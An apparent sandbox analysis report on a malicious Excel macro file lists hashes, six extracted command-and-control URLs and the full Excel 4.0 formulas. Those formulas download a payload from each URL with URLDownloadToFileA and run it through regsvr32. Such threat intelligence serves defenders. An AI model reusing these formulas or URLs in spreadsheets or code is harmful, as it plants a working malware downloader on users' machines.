General

  • Target

    865a77019eb39474518493a2d0f8499d33cbbdcac68a958f29d0f46b6e041eb4

  • Size

    40KB

  • MD5

    2be5f58cc856cdd101e6c5fa24543a1d

  • SHA1

    762a17da15560c510715f5a956fe8118402e927d

  • SHA256

    865a77019eb39474518493a2d0f8499d33cbbdcac68a958f29d0f46b6e041eb4

  • SHA512

    03da13aa228cc98596cbf5bb50824adc405de503e9b9d2bb80f7baa60c78d961037176fd4838041bd98dc04bf951410f62bbabe0c461e72dcfc06f83a7f339ed

  • SSDEEP

    768:itby3nCsqi1O3mnOzyKfcrND59V+L9Rw4eWrXcTqy0y3:abunC5iymqylND59V4jwmXc2Xy3

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://foroviviendaparaguay.com/wp-admin/hx8U6XMffnkv8HI2Oig/

http://en.pachammer.com/wp-content/vIG/

http://ghsjalkherabsr.com/oz03n/6XeYLjFXcFE/

http://ghsmadonabsr.com/wp-includes/Of4kQNCp2WLy0F4B/

http://www.aacitygroup.com/wp-content/EkY9/

https://theoutsourcedaccountant.com/images/nFikTQmP/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://foroviviendaparaguay.com/wp-admin/hx8U6XMffnkv8HI2Oig/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://en.pachammer.com/wp-content/vIG/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ghsjalkherabsr.com/oz03n/6XeYLjFXcFE/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ghsmadonabsr.com/wp-includes/Of4kQNCp2WLy0F4B/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/wp-content/EkY9/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://theoutsourcedaccountant.com/images/nFikTQmP/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 865a77019eb39474518493a2d0f8499d33cbbdcac68a958f29d0f46b6e041eb4
    .xlsm office2007